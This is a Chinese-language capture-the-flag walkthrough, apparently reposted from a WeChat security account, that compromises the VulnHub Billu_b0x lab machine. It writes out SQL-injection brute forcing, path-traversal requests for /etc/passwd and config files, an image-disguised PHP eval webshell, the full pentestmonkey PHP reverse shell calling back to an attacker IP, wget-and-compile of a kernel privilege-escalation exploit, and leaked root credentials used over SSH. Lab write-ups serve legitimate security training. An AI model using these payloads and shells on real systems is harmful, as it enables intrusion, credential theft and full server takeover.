靶机实战系列之Billu_b0x靶机

admin
admin
admin
102369
文章
87
评论
2023年6月26日12:44:59评论7 views字数 13507阅读45分1秒阅读模式
靶机地址:

https://download.vulnhub.com/billu/Billu_b0x.zip

内容简介:
在这次打靶过程中,将使用到以下攻击手段

主机发现 端口扫描 WEB信息收集
SQL注入(SQLMAP跑不出来)
文件包含漏洞 文件上传漏洞
任意文件下载 源码审计
内核漏洞提权

1.1 主机发现

arp-scan  -l

靶机实战系列之Billu_b0x靶机

1.2 端口扫描

nmap -p-  192.168.112.130

靶机实战系列之Billu_b0x靶机


nmap -p22,80 -sV  -sC   192.168.112.130   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-09 05:11 ESTNmap scan report for 192.168.112.130Host is up (0.00069s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))| http-cookie-flags: |   /: |     PHPSESSID: |_      httponly flag not set|_http-title: --==[[IndiShell Lab]]==--|_http-server-header: Apache/2.2.22 (Ubuntu)MAC Address: 00:0C:29:0B:39:35 (VMware)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

1.3 SQL注入

对该网址进行http://192.168.112.130/访问

发现需要用到sql注入

靶机实战系列之Billu_b0x靶机

抓包得到

POST / HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 65Origin: http://192.168.112.130Connection: closeReferer: http://192.168.112.130/Cookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1
un=§123§&ps=§123§&login=%E8%AE%A9%E6%88%91%E4%BB%AC%E7%99%BB%E9%99%86
在un和ps同时爆破sql注入密码字典尝试un:/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt字典路径ps:字典为burp自带sql字典

靶机实战系列之Billu_b0x靶机

参数2用burp自带字典

靶机实战系列之Billu_b0x靶机

开始爆破出现302处注入成功

靶机实战系列之Billu_b0x靶机

重放请求包到浏览器

靶机实战系列之Billu_b0x靶机

跳转到http://192.168.112.130/panel.php

靶机实战系列之Billu_b0x靶机

1.4 文件包含+文件上传

dirsearch -u  http://192.168.112.130

靶机实战系列之Billu_b0x靶机

访问该网址打开
http://192.168.112.130/add.php

有点像上传文件的接口

靶机实战系列之Billu_b0x靶机

抓包测试

POST /panel.php HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 36Origin: http://192.168.112.130Connection: closeReferer: http://192.168.112.130/panel.phpCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1
load=add&continue=%E7%BB%A7%E7%BB%AD
存在加载add.php文件,存在文件包含修改 add的话,就访问不到那个上传文件接口

修改为

../../../../../../../../../../etc/passwd

加载passwd文件存在文件包含

POST /panel.php HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 73Origin: http://192.168.112.130Connection: closeReferer: http://192.168.112.130/panel.phpCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1
load=../../../../../../../../../../etc/passwd&continue=%E7%BB%A7%E7%BB%AD

靶机实战系列之Billu_b0x靶机

打开

http://192.168.112.130/panel.php

文件上传接口

靶机实战系列之Billu_b0x靶机

当我上传一个php文件时发现不可以上传

靶机实战系列之Billu_b0x靶机

抓包查看

POST /panel.php HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------10474904140937799821346063474Content-Length: 715Origin: http://192.168.112.130Connection: closeReferer: http://192.168.112.130/panel.phpCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1
-----------------------------10474904140937799821346063474Content-Disposition: form-data; name="image"; filename="1.png"Content-Type: image/png
GIF89a
<?php @eval($_POST['1']);?>-----------------------------10474904140937799821346063474Content-Disposition: form-data; name="name"
name123-----------------------------10474904140937799821346063474Content-Disposition: form-data; name="address"
address-----------------------------10474904140937799821346063474Content-Disposition: form-data; name="id"
1337-----------------------------10474904140937799821346063474Content-Disposition: form-data; name="upload"
上传-----------------------------10474904140937799821346063474--

修改为以上请求包即可上传成功!

靶机实战系列之Billu_b0x靶机

上传一个反弹shell

cp  /usr/share/webshells/php/php-reverse-shell.php .mv    php-reverse-shell.php   123.png     //  需要修改 反弹代理 里面  ip
POST /panel.php HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------31115094725966488031053493073Content-Length: 6193Origin: http://192.168.112.130Connection: closeReferer: http://192.168.112.130/panel.phpCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1
-----------------------------31115094725966488031053493073Content-Disposition: form-data; name="image"; filename="123.png"Content-Type: image/png
GIF89a;
<?php// php-reverse-shell - A Reverse Shell implementation in PHP// Copyright (C) 2007 [email protected]//// This tool may be used for legal purposes only.  Users take full responsibility// for any actions performed using this tool.  The author accepts no liability// for damage caused by this tool.  If these terms are not acceptable to you, then// do not use this tool.//// In all other respects the GPL version 2 applies://// This program is free software; you can redistribute it and/or modify// it under the terms of the GNU General Public License version 2 as// published by the Free Software Foundation.//// This program is distributed in the hope that it will be useful,// but WITHOUT ANY WARRANTY; without even the implied warranty of// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the// GNU General Public License for more details.//// You should have received a copy of the GNU General Public License along// with this program; if not, write to the Free Software Foundation, Inc.,// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.//// This tool may be used for legal purposes only.  Users take full responsibility// for any actions performed using this tool.  If these terms are not acceptable to// you, then do not use this tool.//// You are encouraged to send comments, improvements or suggestions to// me at [email protected]//// Description// -----------// This script will make an outbound TCP connection to a hardcoded IP and port.// The recipient will be given a shell running as the current user (apache normally).//// Limitations// -----------// proc_open and stream_set_blocking require PHP version 4.3+, or 5+// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.//// Usage// -----// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);$VERSION = "1.0";$ip = '192.168.112.128';  // CHANGE THIS$port = 1234;       // CHANGE THIS$chunk_size = 1400;$write_a = null;$error_a = null;$shell = 'uname -a; w; id; /bin/sh -i';$daemon = 0;$debug = 0;
//// Daemonise ourself if possible to avoid zombies later//
// pcntl_fork is hardly ever available, but will allow us to daemonise// our php process and avoid zombies.  Worth a try...if (function_exists('pcntl_fork')) {  // Fork and have the parent process exit  $pid = pcntl_fork();    if ($pid == -1) {    printit("ERROR: Can't fork");    exit(1);  }    if ($pid) {    exit(0);  // Parent exits  }
  // Make the current process a session leader  // Will only succeed if we forked  if (posix_setsid() == -1) {    printit("Error: Can't setsid()");    exit(1);  }
  $daemon = 1;} else {  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");}
// Change to a safe directorychdir("/");
// Remove any umask we inheritedumask(0);
//// Do the reverse shell...//
// Open reverse connection$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {  printit("$errstr ($errno)");  exit(1);}
// Spawn shell process$descriptorspec = array(   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to   2 => array("pipe", "w")   // stderr is a pipe that the child will write to);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {  printit("ERROR: Can't spawn shell");  exit(1);}
// Set everything to non-blocking// Reason: Occsionally reads will block, even though stream_select tells us they won'tstream_set_blocking($pipes[0], 0);stream_set_blocking($pipes[1], 0);stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {  // Check for end of TCP connection  if (feof($sock)) {    printit("ERROR: Shell connection terminated");    break;  }
  // Check for end of STDOUT  if (feof($pipes[1])) {    printit("ERROR: Shell process terminated");    break;  }
  // Wait until a command is end down $sock, or some  // command output is available on STDOUT or STDERR  $read_a = array($sock, $pipes[1], $pipes[2]);  $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  // If we can read from the TCP socket, send  // data to process's STDIN  if (in_array($sock, $read_a)) {    if ($debug) printit("SOCK READ");    $input = fread($sock, $chunk_size);    if ($debug) printit("SOCK: $input");    fwrite($pipes[0], $input);  }
  // If we can read from the process's STDOUT  // send data down tcp connection  if (in_array($pipes[1], $read_a)) {    if ($debug) printit("STDOUT READ");    $input = fread($pipes[1], $chunk_size);    if ($debug) printit("STDOUT: $input");    fwrite($sock, $input);  }
  // If we can read from the process's STDERR  // send data down tcp connection  if (in_array($pipes[2], $read_a)) {    if ($debug) printit("STDERR READ");    $input = fread($pipes[2], $chunk_size);    if ($debug) printit("STDERR: $input");    fwrite($sock, $input);  }}
fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);
// Like print, but does nothing if we've daemonised ourself// (I can't figure out how to redirect STDOUT like a proper daemon)function printit ($string) {  if (!$daemon) {    print "$stringn";  }}
?> 



-----------------------------31115094725966488031053493073Content-Disposition: form-data; name="name"
name111111-----------------------------31115094725966488031053493073Content-Disposition: form-data; name="address"
address-----------------------------31115094725966488031053493073Content-Disposition: form-data; name="id"
123123-----------------------------31115094725966488031053493073Content-Disposition: form-data; name="upload"
上传-----------------------------31115094725966488031053493073--

利用文件包含读取

POST /panel.php HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 62Origin: http://192.168.112.130Connection: closeReferer: http://192.168.112.130/panel.phpCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1
load=/uploaded_images/123.png&continue=%E7%BB%A7%E7%BB%AD

在kali上启动反弹 

nc  -lvnp 1234

靶机实战系列之Billu_b0x靶机

成功!!

1.5 提权

内核漏洞提权

python -c "import pty;pty.spawn('/bin/bash')"uname -a

靶机实战系列之Billu_b0x靶机

根据这个内核版本可以找到内核漏洞代码

靶机实战系列之Billu_b0x靶机

cp   /usr/share/exploitdb/exploits/linux/local/37292.c .mv  37292.c exp.cpython3  -m  http.server  80cd /tmpwget http://192.168.112.128/exp.cgcc  exp.c -o expchmod +x exp./exp

靶机实战系列之Billu_b0x靶机

提权成功

任意文件下载

dirsearch -u  http://192.168.112.13

靶机实战系列之Billu_b0x靶机

http://192.168.112.130/test

发现缺少个file参数

靶机实战系列之Billu_b0x靶机

需要用到POST方法提交于是抓包

GET /test?file=../../../../../../../etc/passwd HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1

使用Change request method

靶机实战系列之Billu_b0x靶机

POST /test HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 36
file=../../../../../../../etc/passwd

靶机实战系列之Billu_b0x靶机

从index.php中读取出来了c.php

靶机实战系列之Billu_b0x靶机

POST /test HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 10
file=c.php

靶机实战系列之Billu_b0x靶机

读取到了 数据库的 账号密码  billu  b0x_billu

http://192.168.112.130/phpmy/

访问上述网址利用账号密码登录

靶机实战系列之Billu_b0x靶机

靶机实战系列之Billu_b0x靶机

发现账号密码    biLLu  hEx_it

web爬取

dirsearch -u  http://192.168.112.130/phpmy/

靶机实战系列之Billu_b0x靶机

读取phpmy/config.inc.php文件内容

POST /test HTTP/1.1Host: 192.168.112.130User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=4v3b0sakrrt40vcs51q8f1v0odUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 25
file=phpmy/config.inc.php

靶机实战系列之Billu_b0x靶机

得到账号密码     root    roottoor
ssh  root@192.168.112.130    //密码   roottoor

靶机实战系列之Billu_b0x靶机

成功

注:如有侵权请后台联系进行删除

原文始发于微信公众号(嗨嗨安全):靶机实战系列之Billu_b0x靶机

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月26日12:44:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机实战系列之Billu_b0x靶机http://cn-sec.com/archives/1834472.html

发表评论

匿名网友 填写信息